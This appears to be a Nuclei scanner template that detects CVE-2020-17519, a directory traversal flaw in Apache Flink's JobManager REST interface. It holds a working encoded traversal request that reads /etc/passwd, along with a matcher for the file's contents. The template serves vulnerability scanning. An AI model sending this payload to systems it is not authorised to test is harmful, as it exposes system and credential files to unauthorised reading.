29 lines
924 B
YAML
29 lines
924 B
YAML
id: CVE-2020-17519
|
|
|
|
info:
|
|
name: Apache Flink directory traversal
|
|
author: pdteam
|
|
severity: high
|
|
description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
|
|
reference: https://github.com/B1anda0/CVE-2020-17519
|
|
tags: cve,cve2020,apache,lfi,flink
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.50
|
|
cve-id: CVE-2020-17519
|
|
cwe-id: CWE-552
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
part: body
|